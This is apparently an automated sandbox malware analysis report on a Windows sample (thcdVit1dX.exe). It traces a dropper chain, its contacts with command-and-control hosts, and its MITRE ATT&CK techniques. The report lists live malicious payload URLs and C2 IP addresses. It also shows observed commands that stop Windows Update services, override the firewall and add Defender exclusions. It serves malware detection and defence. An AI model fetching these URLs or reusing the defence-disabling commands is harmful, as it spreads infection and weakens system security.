                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\2355412914.exe VolumeInformation
                              Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0046E9BB CreateNamedPipeW,GetLastError | 0_2_0046E9BB
                              Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00405E84 GetLocalTime,CreateFileW,GetLastError,Sleep,CloseHandle | 0_2_00405E84
                              Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0040AAD0 GetUserNameW,GetLastError | 0_2_0040AAD0
                              Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00475E11 GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime | 0_2_00475E11

                              Lowering of HIPS / PFW / Operating System Security Settings

                              Source: C:\Windows\sysppvrdnvs.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverride
                              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
                              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
                              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
                              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
                              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait

                              Remote Access Functionality

                              Source: Yara match | File source: 4.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 3.0.71384504.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 26.0.2658326577.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 26.2.2658326577.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 4.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 3.2.71384504.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara match | File source: Process Memory Space: 71384504.exe PID: 7464, type: MEMORYSTR
                              Source: Yara match | File source: Process Memory Space: sysppvrdnvs.exe PID: 7488, type: MEMORYSTR
                              Source: Yara match | File source: Process Memory Space: sysppvrdnvs.exe PID: 8108, type: MEMORYSTR
                              Source: Yara match | File source: Process Memory Space: 2658326577.exe PID: 1400, type: MEMORYSTR
                              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\2658326577.exe, type: DROPPED
                              Source: Yara match | File source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
                              Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe, type: DROPPED
                              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\71384504.exe, type: DROPPED
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread | 3_2_00401470
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect | 3_2_00402020
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket | 3_2_0040E190
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_004013B0 CreateEventA,socket,bind,CreateThread | 3_2_004013B0
                              Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread | 4_2_00401470
                              Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect | 4_2_00402020
                              Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket | 4_2_0040E190
                              Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_004013B0 CreateEventA,socket,bind,CreateThread | 4_2_004013B0
                              Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread | 17_2_00401470
                              Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect | 17_2_00402020
                              Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket | 17_2_0040E190
                              Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_004013B0 CreateEventA,socket,bind,CreateThread | 17_2_004013B0
                              MITRE ATT&CK Matrix, listed by tactic column (hit count in parentheses; techniques without a count had no matching signature):

                              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                              Execution: Native API (13); Command and Scripting Interpreter (3); Scheduled Task/Job (1); Service Execution (2); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                              Persistence: DLL Side-Loading (1); Windows Service (12); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                              Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (12); Process Injection (12); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (1); Startup Items; Scheduled Task/Job; At; Cron
                              Defense Evasion: Disable or Modify Tools (31); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Masquerading (121); Modify Registry (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (12); Hidden Files and Directories (1)
                              Credential Access: Input Capture (11); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                              Discovery: System Time Discovery (12); Account Discovery (1); System Network Connections Discovery (1); File and Directory Discovery (2); System Information Discovery (35); Security Software Discovery (231); Process Discovery (2); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Owner/User Discovery (1)
                              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                              Collection: Archive Collected Data (1); Input Capture (11); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                              Command and Control: Ingress Tool Transfer (12); Encrypted Channel (2); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (22); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              Behavior Graph ID: 1542686; Sample: thcdVit1dX.exe; Startdate: 26/10/2024; Architecture: WINDOWS; Score: 100. The graph's node and edge labels, rendered as a process tree (the small counters next to process names are the graph's file/registry counters, see Legend):

                              Start: twizt.net; signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 10 other signatures
                              - thcdVit1dX.exe 20 (started): contacts twizt.net 185.215.113.66, 49720, 49721, 49771 WHOLESALECONNECTIONSNL Portugal; dropped C:\Users\user\AppData\Local\Temp\4BBF.exe (PE32), C:\Users\user\AppData\Local\...\pei[1].exe (PE32); signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
                                - 4BBF.exe 16 (started): dropped C:\Users\user\AppData\Local\...\71384504.exe (PE32), C:\Users\user\AppData\Local\...\newtpp[1].exe (PE32); signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Hides that the sample has been downloaded from the Internet (zone.identifier)
                                  - 71384504.exe 1 1 (started): dropped C:\Windows\sysppvrdnvs.exe (PE32); signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking mutex); 5 other signatures
                                    - sysppvrdnvs.exe 10 25 (started): contacts 2.180.10.247, 40500 TCIIR Iran (ISLAMIC Republic Of); 2.184.189.189, 40500 TCIIR Iran (ISLAMIC Republic Of); 7 other IPs or domains; dropped C:\Users\user\AppData\...\2658326577.exe (PE32), C:\Users\user\AppData\...\2355412914.exe (PE32+), C:\Users\user\AppData\Local\...\651713841.exe (data), C:\Users\user\AppData\...\1863518468.exe (data); signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking mutex); 6 other signatures
                                      - 2355412914.exe 2 (started): signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                                        - cmd.exe (started): signatures: Uses schtasks.exe or at.exe to add and modify task schedules
                                          - conhost.exe (started)
                                          - reg.exe (started)
                                        - cmd.exe (started)
                                          - conhost.exe (started)
                                          - schtasks.exe (started)
                                      - cmd.exe 1 (started): signatures: Adds a directory exclusion to Windows Defender; Stops critical windows services
                                        - powershell.exe 23 (started): signatures: Loading BitLocker PowerShell Module
                                          - WmiPrvSE.exe (started)
                                        - conhost.exe (started)
                                      - 2658326577.exe (started): signatures: Antivirus detection for dropped file
                                      - cmd.exe 1 (started)
                                        - conhost.exe (started)
                                        - sc.exe 1 (started)
                                        - sc.exe 1 (started)
                                        - 3 other processes
                              - sysppvrdnvs.exe (started)

Source | Detection | Scanner | Label | Link
thcdVit1dX.exe | 66% | ReversingLabs | Win32.Ransomware.GandCrab |
thcdVit1dX.exe | 62% | Virustotal | | Browse
thcdVit1dX.exe | 100% | Avira | W32/Infector.Gen |
thcdVit1dX.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\2658326577.exe | 100% | Avira | HEUR/AGEN.1315882 |
C:\Windows\sysppvrdnvs.exe | 100% | Avira | HEUR/AGEN.1315882 |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe | 100% | Avira | HEUR/AGEN.1315882 |
C:\Users\user\AppData\Local\Temp\71384504.exe | 100% | Avira | HEUR/AGEN.1315882 |
C:\Users\user\AppData\Local\Temp\2658326577.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\2355412914.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exe | 100% | Joe Sandbox ML | |
C:\Windows\sysppvrdnvs.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\71384504.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\4BBF.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe | 82% | ReversingLabs | Win32.Trojan.MintZard |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exe | 66% | ReversingLabs | Win32.Trojan.MintZard |
C:\Users\user\AppData\Local\Temp\2355412914.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.InjectorX |
C:\Users\user\AppData\Local\Temp\2658326577.exe | 82% | ReversingLabs | Win32.Trojan.MintZard |
C:\Users\user\AppData\Local\Temp\4BBF.exe | 66% | ReversingLabs | Win32.Trojan.MintZard |
C:\Users\user\AppData\Local\Temp\71384504.exe | 82% | ReversingLabs | Win32.Trojan.MintZard |
C:\Windows\sysppvrdnvs.exe | 82% | ReversingLabs | Win32.Trojan.MintZard |
                              No Antivirus matches
Source | Detection | Scanner | Label | Link
bg.microsoft.map.fastly.net | 0% | Virustotal | | Browse
twizt.net | 20% | Virustotal | | Browse
fp2e7a.wpc.phicdn.net | 0% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0# | 0% | URL Reputation | safe |
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe |
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/envelope/ | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe |
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0 | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0# | 0% | URL Reputation | safe |
https://sectigo.com/CPS0 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | 0% | URL Reputation | safe |
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | 0% | URL Reputation | safe |
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z | 0% | URL Reputation | safe |
http://185.215.113.66/pei.exe | 17% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown
twizt.net | 185.215.113.66 | true | true | | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.66/pei.exe | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0# | thcdVit1dX.exe | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | thcdVit1dX.exe | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | thcdVit1dX.exe | false | URL Reputation: safe | unknown
http://91.202.233.141/ | 71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.dr | true | | unknown
http://schemas.xmlsoap.org/soap/envelope/ | 71384504.exe.2.dr | false | URL Reputation: safe | unknown
http://twizt.net/newtpp.exek | 4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | thcdVit1dX.exe | false | URL Reputation: safe | unknown
http://185.215.113.66/11 | sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://twizt.net/newtpp.exes | 4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.66/pei.exe( | thcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/der | sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/3~Y | sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0 | thcdVit1dX.exe | false | URL Reputation: safe | unknown
http://185.215.113.66/ | 71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.dr | true | | unknown
http://91.202.233.141/dwntbl | sysppvrdnvs.exe, 00000004.00000002.2523875975.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2525738269.0000000005D8D000.00000004.00000010.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/10Y | sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0# | thcdVit1dX.exe | false | URL Reputation: safe | unknown
http://91.202.233.141/dwntbll | sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://twizt.net/newtpp.exe: | 4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
https://sectigo.com/CPS0 | thcdVit1dX.exe | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | 71384504.exe.2.dr | false | URL Reputation: safe | unknown
http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s | 71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.dr | false | | unknown
http://185.215.113.66/19YW | sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/3ZY | sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | thcdVit1dX.exe | false | URL Reputation: safe | unknown
http://185.215.113.66/3 | sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/2 | sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000770000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/1r | sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/pei.exei | thcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://twizt.net/peinstall.phpshqos.dll.mui | 4BBF.exe, 00000002.00000002.2288265241.0000000000A74000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.66/1 | sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://ocsp.sectigo.com0# | thcdVit1dX.exe | false | | unknown
http://185.215.113.66/1s | sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://91.202.233.141/dwntbltwork | sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/tdrp.exe%s:Zone.Identifier/c | 71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.dr | false | | unknown
http://185.215.113.66/pei.exep | thcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/1LMEM0xHm | sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
